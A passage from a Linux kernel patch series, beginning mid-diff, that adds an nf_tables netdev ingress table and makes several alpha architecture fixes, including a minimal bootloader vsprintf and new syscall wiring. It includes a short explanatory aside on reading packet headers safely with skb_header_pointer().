list_add_tail_rcu(&table->list, &afi->tables); return 0; -err2: +err3: kfree(table); -err1: +err2: module_put(afi->owner); +err1: + if (dev != NULL) + dev_put(dev); + return err; } @@ -806,6 +838,9 @@ static void nf_tables_table_destroy(struct nft_ctx *ctx) { BUG_ON(ctx->table->use > 0); + if (ctx->table->dev) + dev_put(ctx->table->dev); + kfree(ctx->table); module_put(ctx->afi->owner); } @@ -1361,6 +1396,7 @@ static int nf_tables_newchain(struct sock *nlsk, struct sk_buff *skb, ops->priority = priority; ops->priv = chain; ops->hook = afi->hooks[ops->hooknum]; + ops->dev = table->dev; if (hookfn) ops->hook = hookfn; if (afi->hook_ops_init) From ed6c4136f1571bd6ab362afc3410905a8a69ca42 Mon Sep 17 00:00:00 2001 From: Pablo Neira Ayuso Date: Tue, 26 May 2015 18:41:40 +0200 Subject: [PATCH 250/872] netfilter: nf_tables: add netdev table to filter from ingress This allows us to create netdev tables that contain ingress chains. Use skb_header_pointer() as we may see shared sk_buffs at this stage. This change provides access to the existing nf_tables features from the ingress hook. 
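One point worth underlining from the description above: at the ingress hook the skb may be shared and its headers may not be linear, so headers are read through skb_header_pointer(), which copies into a caller-supplied buffer when needed instead of dereferencing skb->data directly. A generic sketch of that pattern (illustrative only, not the new file's code):

	#include <linux/skbuff.h>
	#include <linux/ip.h>

	/* Returns the IPv4 payload protocol, or -1 if no sane header is there. */
	static int peek_l4_protocol(const struct sk_buff *skb)
	{
		struct iphdr _iph;
		const struct iphdr *iph;

		/* Copies into _iph if the header is nonlinear; never writes to
		 * the (possibly shared) skb. */
		iph = skb_header_pointer(skb, skb_network_offset(skb),
					 sizeof(_iph), &_iph);
		if (!iph || iph->version != 4 || iph->ihl < 5)
			return -1;

		return iph->protocol;
	}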
Signed-off-by: Pablo Neira Ayuso --- include/net/netns/nftables.h | 1 + net/netfilter/Kconfig | 5 + net/netfilter/Makefile | 1 + net/netfilter/nf_tables_netdev.c | 183 +++++++++++++++++++++++++++++++ 4 files changed, 190 insertions(+) create mode 100644 net/netfilter/nf_tables_netdev.c diff --git a/include/net/netns/nftables.h b/include/net/netns/nftables.h index eee608b12cc9..c80781146019 100644 --- a/include/net/netns/nftables.h +++ b/include/net/netns/nftables.h @@ -13,6 +13,7 @@ struct netns_nftables { struct nft_af_info *inet; struct nft_af_info *arp; struct nft_af_info *bridge; + struct nft_af_info *netdev; unsigned int base_seq; u8 gencursor; }; diff --git a/net/netfilter/Kconfig b/net/netfilter/Kconfig index 9a89e7c67d78..bd5aaebaa9a2 100644 --- a/net/netfilter/Kconfig +++ b/net/netfilter/Kconfig @@ -456,6 +456,11 @@ config NF_TABLES_INET help This option enables support for a mixed IPv4/IPv6 "inet" table. +config NF_TABLES_NETDEV + tristate "Netfilter nf_tables netdev tables support" + help + This option enables support for the "netdev" table. + config NFT_EXTHDR tristate "Netfilter nf_tables IPv6 exthdr module" help diff --git a/net/netfilter/Makefile b/net/netfilter/Makefile index a87d8b8ec730..70d026d46fe7 100644 --- a/net/netfilter/Makefile +++ b/net/netfilter/Makefile @@ -75,6 +75,7 @@ nf_tables-objs += nft_bitwise.o nft_byteorder.o nft_payload.o obj-$(CONFIG_NF_TABLES) += nf_tables.o obj-$(CONFIG_NF_TABLES_INET) += nf_tables_inet.o +obj-$(CONFIG_NF_TABLES_NETDEV) += nf_tables_netdev.o obj-$(CONFIG_NFT_COMPAT) += nft_compat.o obj-$(CONFIG_NFT_EXTHDR) += nft_exthdr.o obj-$(CONFIG_NFT_META) += nft_meta.o diff --git a/net/netfilter/nf_tables_netdev.c b/net/netfilter/nf_tables_netdev.c new file mode 100644 index 000000000000..04cb17057f46 --- /dev/null +++ b/net/netfilter/nf_tables_netdev.c @@ -0,0 +1,183 @@ +/* + * Copyright (c) 2015 Pablo Neira Ayuso + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 as + * published by the Free Software Foundation. 
+ */ + +#include +#include +#include +#include +#include +#include +#include + +static inline void +nft_netdev_set_pktinfo_ipv4(struct nft_pktinfo *pkt, + const struct nf_hook_ops *ops, struct sk_buff *skb, + const struct nf_hook_state *state) +{ + struct iphdr *iph, _iph; + u32 len, thoff; + + nft_set_pktinfo(pkt, ops, skb, state); + + iph = skb_header_pointer(skb, skb_network_offset(skb), sizeof(*iph), + &_iph); + if (!iph) + return; + + iph = ip_hdr(skb); + if (iph->ihl < 5 || iph->version != 4) + return; + + len = ntohs(iph->tot_len); + thoff = iph->ihl * 4; + if (skb->len < len) + return; + else if (len < thoff) + return; + + pkt->tprot = iph->protocol; + pkt->xt.thoff = thoff; + pkt->xt.fragoff = ntohs(iph->frag_off) & IP_OFFSET; +} + +static inline void +__nft_netdev_set_pktinfo_ipv6(struct nft_pktinfo *pkt, + const struct nf_hook_ops *ops, + struct sk_buff *skb, + const struct nf_hook_state *state) +{ +#if IS_ENABLED(CONFIG_IPV6) + struct ipv6hdr *ip6h, _ip6h; + unsigned int thoff = 0; + unsigned short frag_off; + int protohdr; + u32 pkt_len; + + ip6h = skb_header_pointer(skb, skb_network_offset(skb), sizeof(*ip6h), + &_ip6h); + if (!ip6h) + return; + + if (ip6h->version != 6) + return; + + pkt_len = ntohs(ip6h->payload_len); + if (pkt_len + sizeof(*ip6h) > skb->len) + return; + + protohdr = ipv6_find_hdr(pkt->skb, &thoff, -1, &frag_off, NULL); + if (protohdr < 0) + return; + + pkt->tprot = protohdr; + pkt->xt.thoff = thoff; + pkt->xt.fragoff = frag_off; +#endif +} + +static inline void nft_netdev_set_pktinfo_ipv6(struct nft_pktinfo *pkt, + const struct nf_hook_ops *ops, + struct sk_buff *skb, + const struct nf_hook_state *state) +{ + nft_set_pktinfo(pkt, ops, skb, state); + __nft_netdev_set_pktinfo_ipv6(pkt, ops, skb, state); +} + +static unsigned int +nft_do_chain_netdev(const struct nf_hook_ops *ops, struct sk_buff *skb, + const struct nf_hook_state *state) +{ + struct nft_pktinfo pkt; + + switch (eth_hdr(skb)->h_proto) { + case htons(ETH_P_IP): + nft_netdev_set_pktinfo_ipv4(&pkt, ops, skb, state); + break; + case htons(ETH_P_IPV6): + nft_netdev_set_pktinfo_ipv6(&pkt, ops, skb, state); + break; + default: + nft_set_pktinfo(&pkt, ops, skb, state); + break; + } + + return nft_do_chain(&pkt, ops); +} + +static struct nft_af_info nft_af_netdev __read_mostly = { + .family = NFPROTO_NETDEV, + .nhooks = NF_NETDEV_NUMHOOKS, + .owner = THIS_MODULE, + .flags = NFT_AF_NEEDS_DEV, + .nops = 1, + .hooks = { + [NF_NETDEV_INGRESS] = nft_do_chain_netdev, + }, +}; + +static int nf_tables_netdev_init_net(struct net *net) +{ + net->nft.netdev = kmalloc(sizeof(struct nft_af_info), GFP_KERNEL); + if (net->nft.netdev == NULL) + return -ENOMEM; + + memcpy(net->nft.netdev, &nft_af_netdev, sizeof(nft_af_netdev)); + + if (nft_register_afinfo(net, net->nft.netdev) < 0) + goto err; + + return 0; +err: + kfree(net->nft.netdev); + return -ENOMEM; +} + +static void nf_tables_netdev_exit_net(struct net *net) +{ + nft_unregister_afinfo(net->nft.netdev); + kfree(net->nft.netdev); +} + +static struct pernet_operations nf_tables_netdev_net_ops = { + .init = nf_tables_netdev_init_net, + .exit = nf_tables_netdev_exit_net, +}; + +static const struct nf_chain_type nft_filter_chain_netdev = { + .name = "filter", + .type = NFT_CHAIN_T_DEFAULT, + .family = NFPROTO_NETDEV, + .owner = THIS_MODULE, + .hook_mask = (1 << NF_NETDEV_INGRESS), +}; + +static int __init nf_tables_netdev_init(void) +{ + int ret; + + nft_register_chain_type(&nft_filter_chain_netdev); + ret = register_pernet_subsys(&nf_tables_netdev_net_ops); + if 
(ret < 0) + nft_unregister_chain_type(&nft_filter_chain_netdev); + + return ret; +} + +static void __exit nf_tables_netdev_exit(void) +{ + unregister_pernet_subsys(&nf_tables_netdev_net_ops); + nft_unregister_chain_type(&nft_filter_chain_netdev); +} + +module_init(nf_tables_netdev_init); +module_exit(nf_tables_netdev_exit); + +MODULE_LICENSE("GPL"); +MODULE_AUTHOR("Pablo Neira Ayuso "); +MODULE_ALIAS_NFT_FAMILY(5); /* NFPROTO_NETDEV */ From ebdd117e5aab748d06f872860f36a0b09d8aadfc Mon Sep 17 00:00:00 2001 From: Yijing Wang Date: Thu, 8 Aug 2013 21:13:54 +0800 Subject: [PATCH 251/872] alpha: clean up unnecessary MSI/MSI-X capability find PCI core will initialize device MSI/MSI-X capability in pci_msi_init_pci_dev(). So device driver should use pci_dev->msi_cap/msix_cap to determine whether the device support MSI/MSI-X instead of using pci_find_capability(pci_dev, PCI_CAP_ID_MSI/MSIX). Access to PCIe device config space again will consume more time. Signed-off-by: Yijing Wang Cc: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: Phil Carmody Cc: linux-alpha@vger.kernel.org Signed-off-by: Matt Turner --- arch/alpha/kernel/sys_marvel.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/alpha/kernel/sys_marvel.c b/arch/alpha/kernel/sys_marvel.c index f21d61fab678..24e41bd7d3c9 100644 --- a/arch/alpha/kernel/sys_marvel.c +++ b/arch/alpha/kernel/sys_marvel.c @@ -331,7 +331,7 @@ marvel_map_irq(const struct pci_dev *cdev, u8 slot, u8 pin) pci_read_config_byte(dev, PCI_INTERRUPT_LINE, &intline); irq = intline; - msi_loc = pci_find_capability(dev, PCI_CAP_ID_MSI); + msi_loc = dev->msi_cap; msg_ctl = 0; if (msi_loc) pci_read_config_word(dev, msi_loc + PCI_MSI_FLAGS, &msg_ctl); From ae6d78d78a20c351164d371e94b2aadc54536b40 Mon Sep 17 00:00:00 2001 From: Geert Uytterhoeven Date: Mon, 25 Nov 2013 09:55:22 +0100 Subject: [PATCH 252/872] alpha: Remove #include from Everything in arch/alpha/include/uapi/asm/types.h is protected by "#ifndef __KERNEL__", so it's unused for kernelspace. Signed-off-by: Geert Uytterhoeven Cc: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Matt Turner --- arch/alpha/include/asm/types.h | 1 - 1 file changed, 1 deletion(-) diff --git a/arch/alpha/include/asm/types.h b/arch/alpha/include/asm/types.h index f61e1a56c378..4cb4b6d3452c 100644 --- a/arch/alpha/include/asm/types.h +++ b/arch/alpha/include/asm/types.h @@ -2,6 +2,5 @@ #define _ALPHA_TYPES_H #include -#include #endif /* _ALPHA_TYPES_H */ From 614aab527b3d48f481854c215251471407473599 Mon Sep 17 00:00:00 2001 From: Jiang Liu Date: Mon, 16 Dec 2013 00:36:25 +0800 Subject: [PATCH 253/872] smp, alpha: kill SMP single function call interrupt Commit 9a46ad6d6df3b54 "smp: make smp_call_function_many() use logic similar to smp_call_function_single()" has unified the way to handle single and multiple cross-CPU function calls. Now only one interrupt is needed for architecture specific code to support generic SMP function call interfaces, so kill the redundant single function call interrupt. 
Cc: Andrew Morton Cc: Shaohua Li Cc: Peter Zijlstra Cc: Ingo Molnar Cc: Steven Rostedt Cc: Jiri Kosina Cc: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Jiang Liu Signed-off-by: Matt Turner --- arch/alpha/kernel/smp.c | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/arch/alpha/kernel/smp.c b/arch/alpha/kernel/smp.c index 99ac36d5de4e..2f24447fef92 100644 --- a/arch/alpha/kernel/smp.c +++ b/arch/alpha/kernel/smp.c @@ -63,7 +63,6 @@ static struct { enum ipi_message_type { IPI_RESCHEDULE, IPI_CALL_FUNC, - IPI_CALL_FUNC_SINGLE, IPI_CPU_STOP, }; @@ -506,7 +505,6 @@ setup_profiling_timer(unsigned int multiplier) return -EINVAL; } - static void send_ipi_message(const struct cpumask *to_whom, enum ipi_message_type operation) { @@ -552,10 +550,6 @@ handle_ipi(struct pt_regs *regs) generic_smp_call_function_interrupt(); break; - case IPI_CALL_FUNC_SINGLE: - generic_smp_call_function_single_interrupt(); - break; - case IPI_CPU_STOP: halt(); @@ -606,7 +600,7 @@ void arch_send_call_function_ipi_mask(const struct cpumask *mask) void arch_send_call_function_single_ipi(int cpu) { - send_ipi_message(cpumask_of(cpu), IPI_CALL_FUNC_SINGLE); + send_ipi_message(cpumask_of(cpu), IPI_CALL_FUNC); } static void From 11447c7c4f046350f63693e2c935e6b33a1b62a8 Mon Sep 17 00:00:00 2001 From: Paul Gortmaker Date: Fri, 10 Jan 2014 17:02:02 -0500 Subject: [PATCH 254/872] alpha: don't use module_init for non-modular core code The srm console is always built in. It will never be modular, so using module_init as an alias for __initcall is rather misleading. Fix this up now, so that we can relocate module_init from init.h into module.h in the future. If we don't do this, we'd have to add module.h to obviously non-modular code, and that would be a worse thing. Direct use of __initcall is discouraged, vs prioritized ones. Use of device_initcall is consistent with what __initcall maps onto, and hence does not change the init order, making the impact of this change zero. Should someone with real hardware for boot testing want to change it later to arch_initcall or console_initcall, they can do that at a later date. Reviewed-by: Richard Henderson Cc: Ivan Kokshaysky Acked-by: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Paul Gortmaker Signed-off-by: Matt Turner --- arch/alpha/kernel/srmcons.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/alpha/kernel/srmcons.c b/arch/alpha/kernel/srmcons.c index 6f01d9ad7b81..72b59511e59a 100644 --- a/arch/alpha/kernel/srmcons.c +++ b/arch/alpha/kernel/srmcons.c @@ -237,8 +237,7 @@ srmcons_init(void) return -ENODEV; } - -module_init(srmcons_init); +device_initcall(srmcons_init); /* From 0bc25674a4a2ec32140e2f3f0b863cf87e566ad4 Mon Sep 17 00:00:00 2001 From: Paul Gortmaker Date: Tue, 21 Jan 2014 16:22:40 -0500 Subject: [PATCH 255/872] alpha: delete non-required instances of None of these files are actually using any __init type directives and hence don't need to include . Most are just a left over from __devinit and __cpuinit removal, or simply due to code getting copied from one driver to the next. 
Acked-by: Richard Henderson Cc: Ivan Kokshaysky Cc: Matt Turner Cc: linux-alpha@vger.kernel.org Signed-off-by: Paul Gortmaker Signed-off-by: Matt Turner --- arch/alpha/kernel/err_ev6.c | 1 - arch/alpha/kernel/irq.c | 1 - arch/alpha/kernel/traps.c | 1 - arch/alpha/oprofile/op_model_ev4.c | 1 - arch/alpha/oprofile/op_model_ev5.c | 1 - arch/alpha/oprofile/op_model_ev6.c | 1 - arch/alpha/oprofile/op_model_ev67.c | 1 - 7 files changed, 7 deletions(-) diff --git a/arch/alpha/kernel/err_ev6.c b/arch/alpha/kernel/err_ev6.c index 253cf1a87481..51267ac5729b 100644 --- a/arch/alpha/kernel/err_ev6.c +++ b/arch/alpha/kernel/err_ev6.c @@ -6,7 +6,6 @@ * Error handling code supporting Alpha systems */ -#include #include #include diff --git a/arch/alpha/kernel/irq.c b/arch/alpha/kernel/irq.c index 7b2be251c30f..51f2c8654253 100644 --- a/arch/alpha/kernel/irq.c +++ b/arch/alpha/kernel/irq.c @@ -19,7 +19,6 @@ #include #include #include -#include #include #include #include diff --git a/arch/alpha/kernel/traps.c b/arch/alpha/kernel/traps.c index 9c4c189eb22f..74aceead06e9 100644 --- a/arch/alpha/kernel/traps.c +++ b/arch/alpha/kernel/traps.c @@ -14,7 +14,6 @@ #include #include #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev4.c b/arch/alpha/oprofile/op_model_ev4.c index 18aa9b4f94f1..086a0d5445c5 100644 --- a/arch/alpha/oprofile/op_model_ev4.c +++ b/arch/alpha/oprofile/op_model_ev4.c @@ -8,7 +8,6 @@ */ #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev5.c b/arch/alpha/oprofile/op_model_ev5.c index c32f8a0ad925..c300f5ef3482 100644 --- a/arch/alpha/oprofile/op_model_ev5.c +++ b/arch/alpha/oprofile/op_model_ev5.c @@ -8,7 +8,6 @@ */ #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev6.c b/arch/alpha/oprofile/op_model_ev6.c index 1c84cc257fc7..02edf5971614 100644 --- a/arch/alpha/oprofile/op_model_ev6.c +++ b/arch/alpha/oprofile/op_model_ev6.c @@ -8,7 +8,6 @@ */ #include -#include #include #include diff --git a/arch/alpha/oprofile/op_model_ev67.c b/arch/alpha/oprofile/op_model_ev67.c index 34a57a126553..adb1744d20f3 100644 --- a/arch/alpha/oprofile/op_model_ev67.c +++ b/arch/alpha/oprofile/op_model_ev67.c @@ -9,7 +9,6 @@ */ #include -#include #include #include From 9f7b2d1f02c5dae9c7fd59848681c88dc3741819 Mon Sep 17 00:00:00 2001 From: Alex Dowad Date: Fri, 13 Mar 2015 20:04:17 +0200 Subject: [PATCH 256/872] alpha: copy_thread(): rename 'arg' argument to 'kthread_arg' The 'arg' argument to copy_thread() is only ever used when forking a new kernel thread. Hence, rename it to 'kthread_arg' for clarity (and consistency with do_fork() and other arch-specific implementations of copy_thread()). Signed-off-by: Alex Dowad Signed-off-by: Matt Turner --- arch/alpha/kernel/process.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/arch/alpha/kernel/process.c b/arch/alpha/kernel/process.c index 1941a07b5811..84d13263ce46 100644 --- a/arch/alpha/kernel/process.c +++ b/arch/alpha/kernel/process.c @@ -236,12 +236,11 @@ release_thread(struct task_struct *dead_task) } /* - * Copy an alpha thread.. 
+ * Copy architecture-specific thread state */ - int copy_thread(unsigned long clone_flags, unsigned long usp, - unsigned long arg, + unsigned long kthread_arg, struct task_struct *p) { extern void ret_from_fork(void); @@ -262,7 +261,7 @@ copy_thread(unsigned long clone_flags, unsigned long usp, sizeof(struct switch_stack) + sizeof(struct pt_regs)); childstack->r26 = (unsigned long) ret_from_kernel_thread; childstack->r9 = usp; /* function */ - childstack->r10 = arg; + childstack->r10 = kthread_arg; childregs->hae = alpha_mv.hae_cache, childti->pcb.usp = 0; return 0; From 234306038064131a77da176d41e89e2c1535cda9 Mon Sep 17 00:00:00 2001 From: Helge Deller Date: Mon, 23 Mar 2015 22:47:21 +0100 Subject: [PATCH 257/872] alpha: Fix bootpfile and bootpzfile make targets Fix the bootpfile and bootpzfile make targets to create BOOTP images. Both targets were broken due to some missing defines to re-map ELF constants. In addition the old code used the generic vsprintf function of the kernel which we now replace by a simple and much smaller implementation for the bootloader. Signed-off-by: Helge Deller Signed-off-by: Matt Turner --- arch/alpha/boot/Makefile | 16 +- arch/alpha/boot/main.c | 1 - arch/alpha/boot/stdio.c | 306 +++++++++++++++++++++++++++++++ arch/alpha/boot/tools/objstrip.c | 3 + 4 files changed, 319 insertions(+), 7 deletions(-) create mode 100644 arch/alpha/boot/stdio.c diff --git a/arch/alpha/boot/Makefile b/arch/alpha/boot/Makefile index cd143887380a..8399bd0e68e8 100644 --- a/arch/alpha/boot/Makefile +++ b/arch/alpha/boot/Makefile @@ -14,6 +14,9 @@ targets := vmlinux.gz vmlinux \ tools/bootpzh bootloader bootpheader bootpzheader OBJSTRIP := $(obj)/tools/objstrip +HOSTCFLAGS := -Wall -I$(objtree)/usr/include +BOOTCFLAGS += -I$(obj) -I$(srctree)/$(obj) + # SRM bootable image. Copy to offset 512 of a partition.
$(obj)/bootimage: $(addprefix $(obj)/tools/,mkbb lxboot bootlx) $(obj)/vmlinux.nh ( cat $(obj)/tools/lxboot $(obj)/tools/bootlx $(obj)/vmlinux.nh ) > $@ @@ -96,13 +99,14 @@ $(obj)/tools/bootph: $(obj)/bootpheader $(OBJSTRIP) FORCE $(obj)/tools/bootpzh: $(obj)/bootpzheader $(OBJSTRIP) FORCE $(call if_changed,objstrip) -LDFLAGS_bootloader := -static -uvsprintf -T #-N -relax -LDFLAGS_bootpheader := -static -uvsprintf -T #-N -relax -LDFLAGS_bootpzheader := -static -uvsprintf -T #-N -relax +LDFLAGS_bootloader := -static -T # -N -relax +LDFLAGS_bootloader := -static -T # -N -relax +LDFLAGS_bootpheader := -static -T # -N -relax +LDFLAGS_bootpzheader := -static -T # -N -relax -OBJ_bootlx := $(obj)/head.o $(obj)/main.o -OBJ_bootph := $(obj)/head.o $(obj)/bootp.o -OBJ_bootpzh := $(obj)/head.o $(obj)/bootpz.o $(obj)/misc.o +OBJ_bootlx := $(obj)/head.o $(obj)/stdio.o $(obj)/main.o +OBJ_bootph := $(obj)/head.o $(obj)/stdio.o $(obj)/bootp.o +OBJ_bootpzh := $(obj)/head.o $(obj)/stdio.o $(obj)/bootpz.o $(obj)/misc.o $(obj)/bootloader: $(obj)/bootloader.lds $(OBJ_bootlx) $(LIBS_Y) FORCE $(call if_changed,ld) diff --git a/arch/alpha/boot/main.c b/arch/alpha/boot/main.c index 3baf2d1e908d..dd6eb4a33582 100644 --- a/arch/alpha/boot/main.c +++ b/arch/alpha/boot/main.c @@ -19,7 +19,6 @@ #include "ksize.h" -extern int vsprintf(char *, const char *, va_list); extern unsigned long switch_to_osf_pal(unsigned long nr, struct pcb_struct * pcb_va, struct pcb_struct * pcb_pa, unsigned long *vptb); diff --git a/arch/alpha/boot/stdio.c b/arch/alpha/boot/stdio.c new file mode 100644 index 000000000000..f844dae8a54a --- /dev/null +++ b/arch/alpha/boot/stdio.c @@ -0,0 +1,306 @@ +/* + * Copyright (C) Paul Mackerras 1997. + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version + * 2 of the License, or (at your option) any later version. + */ +#include +#include + +size_t strnlen(const char * s, size_t count) +{ + const char *sc; + + for (sc = s; count-- && *sc != '\0'; ++sc) + /* nothing */; + return sc - s; +} + +# define do_div(n, base) ({ \ + unsigned int __base = (base); \ + unsigned int __rem; \ + __rem = ((unsigned long long)(n)) % __base; \ + (n) = ((unsigned long long)(n)) / __base; \ + __rem; \ +}) + + +static int skip_atoi(const char **s) +{ + int i, c; + + for (i = 0; '0' <= (c = **s) && c <= '9'; ++*s) + i = i*10 + c - '0'; + return i; +} + +#define ZEROPAD 1 /* pad with zero */ +#define SIGN 2 /* unsigned/signed long */ +#define PLUS 4 /* show plus */ +#define SPACE 8 /* space if plus */ +#define LEFT 16 /* left justified */ +#define SPECIAL 32 /* 0x */ +#define LARGE 64 /* use 'ABCDEF' instead of 'abcdef' */ + +static char * number(char * str, unsigned long long num, int base, int size, int precision, int type) +{ + char c,sign,tmp[66]; + const char *digits="0123456789abcdefghijklmnopqrstuvwxyz"; + int i; + + if (type & LARGE) + digits = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"; + if (type & LEFT) + type &= ~ZEROPAD; + if (base < 2 || base > 36) + return 0; + c = (type & ZEROPAD) ? 
'0' : ' '; + sign = 0; + if (type & SIGN) { + if ((signed long long)num < 0) { + sign = '-'; + num = - (signed long long)num; + size--; + } else if (type & PLUS) { + sign = '+'; + size--; + } else if (type & SPACE) { + sign = ' '; + size--; + } + } + if (type & SPECIAL) { + if (base == 16) + size -= 2; + else if (base == 8) + size--; + } + i = 0; + if (num == 0) + tmp[i++]='0'; + else while (num != 0) { + tmp[i++] = digits[do_div(num, base)]; + } + if (i > precision) + precision = i; + size -= precision; + if (!(type&(ZEROPAD+LEFT))) + while(size-->0) + *str++ = ' '; + if (sign) + *str++ = sign; + if (type & SPECIAL) { + if (base==8) + *str++ = '0'; + else if (base==16) { + *str++ = '0'; + *str++ = digits[33]; + } + } + if (!(type & LEFT)) + while (size-- > 0) + *str++ = c; + while (i < precision--) + *str++ = '0'; + while (i-- > 0) + *str++ = tmp[i]; + while (size-- > 0) + *str++ = ' '; + return str; +} + +int vsprintf(char *buf, const char *fmt, va_list args) +{ + int len; + unsigned long long num; + int i, base; + char * str; + const char *s; + + int flags; /* flags to number() */ + + int field_width; /* width of output field */ + int precision; /* min. # of digits for integers; max + number of chars for from string */ + int qualifier; /* 'h', 'l', or 'L' for integer fields */ + /* 'z' support added 23/7/1999 S.H. */ + /* 'z' changed to 'Z' --davidm 1/25/99 */ + + + for (str=buf ; *fmt ; ++fmt) { + if (*fmt != '%') { + *str++ = *fmt; + continue; + } + + /* process flags */ + flags = 0; + repeat: + ++fmt; /* this also skips first '%' */ + switch (*fmt) { + case '-': flags |= LEFT; goto repeat; + case '+': flags |= PLUS; goto repeat; + case ' ': flags |= SPACE; goto repeat; + case '#': flags |= SPECIAL; goto repeat; + case '0': flags |= ZEROPAD; goto repeat; + } + + /* get field width */ + field_width = -1; + if ('0' <= *fmt && *fmt <= '9') + field_width = skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + field_width = va_arg(args, int); + if (field_width < 0) { + field_width = -field_width; + flags |= LEFT; + } + } + + /* get the precision */ + precision = -1; + if (*fmt == '.') { + ++fmt; + if ('0' <= *fmt && *fmt <= '9') + precision = skip_atoi(&fmt); + else if (*fmt == '*') { + ++fmt; + /* it's the next argument */ + precision = va_arg(args, int); + } + if (precision < 0) + precision = 0; + } + + /* get the conversion qualifier */ + qualifier = -1; + if (*fmt == 'l' && *(fmt + 1) == 'l') { + qualifier = 'q'; + fmt += 2; + } else if (*fmt == 'h' || *fmt == 'l' || *fmt == 'L' + || *fmt == 'Z') { + qualifier = *fmt; + ++fmt; + } + + /* default base */ + base = 10; + + switch (*fmt) { + case 'c': + if (!(flags & LEFT)) + while (--field_width > 0) + *str++ = ' '; + *str++ = (unsigned char) va_arg(args, int); + while (--field_width > 0) + *str++ = ' '; + continue; + + case 's': + s = va_arg(args, char *); + if (!s) + s = ""; + + len = strnlen(s, precision); + + if (!(flags & LEFT)) + while (len < field_width--) + *str++ = ' '; + for (i = 0; i < len; ++i) + *str++ = *s++; + while (len < field_width--) + *str++ = ' '; + continue; + + case 'p': + if (field_width == -1) { + field_width = 2*sizeof(void *); + flags |= ZEROPAD; + } + str = number(str, + (unsigned long) va_arg(args, void *), 16, + field_width, precision, flags); + continue; + + + case 'n': + if (qualifier == 'l') { + long * ip = va_arg(args, long *); + *ip = (str - buf); + } else if (qualifier == 'Z') { + size_t * ip = va_arg(args, size_t *); + *ip = (str - buf); + } else { + int * ip = 
va_arg(args, int *); + *ip = (str - buf); + } + continue; + + case '%': + *str++ = '%'; + continue; + + /* integer number formats - set up the flags and "break" */ + case 'o': + base = 8; + break; + + case 'X': + flags |= LARGE; + case 'x': + base = 16; + break; + + case 'd': + case 'i': + flags |= SIGN; + case 'u': + break; + + default: + *str++ = '%'; + if (*fmt) + *str++ = *fmt; + else + --fmt; + continue; + } + if (qualifier == 'l') { + num = va_arg(args, unsigned long); + if (flags & SIGN) + num = (signed long) num; + } else if (qualifier == 'q') { + num = va_arg(args, unsigned long long); + if (flags & SIGN) + num = (signed long long) num; + } else if (qualifier == 'Z') { + num = va_arg(args, size_t); + } else if (qualifier == 'h') { + num = (unsigned short) va_arg(args, int); + if (flags & SIGN) + num = (signed short) num; + } else { + num = va_arg(args, unsigned int); + if (flags & SIGN) + num = (signed int) num; + } + str = number(str, num, base, field_width, precision, flags); + } + *str = '\0'; + return str-buf; +} + +int sprintf(char * buf, const char *fmt, ...) +{ + va_list args; + int i; + + va_start(args, fmt); + i=vsprintf(buf,fmt,args); + va_end(args); + return i; +} diff --git a/arch/alpha/boot/tools/objstrip.c b/arch/alpha/boot/tools/objstrip.c index 367d53d031fc..dee82695f48b 100644 --- a/arch/alpha/boot/tools/objstrip.c +++ b/arch/alpha/boot/tools/objstrip.c @@ -27,6 +27,9 @@ #include #ifdef __ELF__ # include +# define elfhdr elf64_hdr +# define elf_phdr elf64_phdr +# define elf_check_arch(x) ((x)->e_machine == EM_ALPHA) #endif /* bootfile size must be multiple of BLOCK_SIZE: */ From 228fa858e5865c9407b0d6710fd504e0b68bc371 Mon Sep 17 00:00:00 2001 From: Chen Gang Date: Mon, 18 May 2015 12:36:50 +0800 Subject: [PATCH 258/872] alpha: Wire up all missing implemented syscalls And still left the missing unimplemented syscalls as warnings. 
The related warnings for missing implemented syscalls: CALL scripts/checksyscalls.sh :1241:2: warning: #warning syscall getrandom not implemented [-Wcpp] :1244:2: warning: #warning syscall memfd_create not implemented [-Wcpp] :1250:2: warning: #warning syscall execveat not implemented [-Wcpp] Signed-off-by: Chen Gang Signed-off-by: Matt Turner --- arch/alpha/include/asm/unistd.h | 2 +- arch/alpha/include/uapi/asm/unistd.h | 3 +++ arch/alpha/kernel/systbls.S | 3 +++ 3 files changed, 7 insertions(+), 1 deletion(-) diff --git a/arch/alpha/include/asm/unistd.h b/arch/alpha/include/asm/unistd.h index c509d306db45..a56e608db2f9 100644 --- a/arch/alpha/include/asm/unistd.h +++ b/arch/alpha/include/asm/unistd.h @@ -3,7 +3,7 @@ #include -#define NR_SYSCALLS 511 +#define NR_SYSCALLS 514 #define __ARCH_WANT_OLD_READDIR #define __ARCH_WANT_STAT64 diff --git a/arch/alpha/include/uapi/asm/unistd.h b/arch/alpha/include/uapi/asm/unistd.h index d214a0358100..aa33bf5aacb6 100644 --- a/arch/alpha/include/uapi/asm/unistd.h +++ b/arch/alpha/include/uapi/asm/unistd.h @@ -472,5 +472,8 @@ #define __NR_sched_setattr 508 #define __NR_sched_getattr 509 #define __NR_renameat2 510 +#define __NR_getrandom 511 +#define __NR_memfd_create 512 +#define __NR_execveat 513 #endif /* _UAPI_ALPHA_UNISTD_H */ diff --git a/arch/alpha/kernel/systbls.S b/arch/alpha/kernel/systbls.S index 24789713f1ea..9b62e3fd4f03 100644 --- a/arch/alpha/kernel/systbls.S +++ b/arch/alpha/kernel/systbls.S @@ -529,6 +529,9 @@ sys_call_table: .quad sys_sched_setattr .quad sys_sched_getattr .quad sys_renameat2 /* 510 */ + .quad sys_getrandom + .quad sys_memfd_create + .quad sys_execveat .size sys_call_table, . - sys_call_table .type sys_call_table, @object From 